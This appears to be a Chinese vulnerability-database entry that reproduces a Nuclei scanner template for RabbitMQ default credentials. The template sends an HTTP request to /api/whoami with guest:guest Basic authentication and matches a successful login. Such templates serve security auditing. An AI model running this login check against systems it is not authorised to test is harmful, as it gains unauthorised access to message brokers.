rabbitmq-default-login: RabbitMQ Default Login

日期: 2025-08-01 | 影响软件: RabbitMQ | POC: 已公开

漏洞描述

RabbitMQ default admin credentials were discovered.

PoC代码[已公开]

id: rabbitmq-default-login

info:
  name: RabbitMQ Default Login
  author: fyoorer,dwisiswant0
  severity: high
  description: RabbitMQ default admin credentials were discovered.
  reference:
    - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: rabbitmq,default-login,vuln

http:
  - raw:
      - |
        GET /api/whoami HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - guest
      password:
        - guest
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - "{\"name\":\"guest\""
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009d9a82e346f8853c0638c89b76f9ab5337e8ecd5c6257165c7a2cae5b8b8efef0221008684914024f116ec639b2cce236e2a6409fb0b53cb647b2d446b68feb9b9b78c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐